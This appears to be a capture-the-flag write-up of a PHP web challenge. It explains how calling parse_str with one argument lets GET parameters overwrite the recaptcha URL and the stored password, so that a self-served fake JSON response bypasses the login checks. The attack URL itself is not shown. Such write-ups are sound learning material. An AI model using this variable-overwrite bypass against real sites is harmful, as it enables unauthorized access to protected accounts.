Above is the link you can download the challenges.
This was a pretty interesting challenge, the “vulnerability/feature” that is exploited is the php function parse_str. By passing only 1 argument to this function, an attacker can overwrite the initialized variables!
Some StackOverflow discussions have also mentioned that this function has been updated to take in 2 arguments since php 7. However, I tested this on my kali that was running php 7.4 and surprisingly, it was still working.
Looking at the login.php, there are 3 conditions that we need to bypass:
$recaptcha_resp = json_decode(file_get_contents($RECAPTCHA_URL.$_GET['g-recaptcha-response']), true);//we need recaptcha_resp["success"] to be true
if(!$recaptcha_resp || !$recaptcha_resp["success"]) {
echo "Bad recaptcha :(";
die();
}//we need the score to be larger than 0.8
if ($recaptcha_resp["score"] < 0.8) {
echo "Stop! Big hacker";
die();
}// check password
// here is only double equal
if($password == $CORRECT_PASSWORD) {
echo $FLAG;
} else {
echo "Wrong password :(";
}
To get the flag, we will need to serve a webpage in json with “success” == true and “score” > 0.8 and password == $CORRECT_PASSWORD. To modify this values, we will modify $RECAPTCHA_URL and $CORRECT_PASSWORD by sending them through a GET request. After serving the fake webpage, browse to this website:
And you will get the flag!
Another thing i noticed was the double equal in the comparison of passwords. I thought it will be possible to exploit the loose type comparison vulnerability in php as well. But upon testing, its not possible because both types are strings .
Another challenge I faced was the json_decode function. Apparently the response/served file must be saved in a certain encoding. I had to transfer it into my host and convert the encoding to ascii on notepad++. Some discussions also mentioned that saving it in utf-8 without BOM(?) would work too.
In my repo above, I have updated the testing scripts for the function, as well as spoofing the variables.
- fake.js = answer for solution and test script for captchaTest.php
- legit.js = test script for captchaTest.php
- captchaTest.php = server side code
- ParseStrTest.php = basic script to test the ParseStr function
Main learning point for my workflow:
1) Trace user inputs through the function, and Google how they are handled
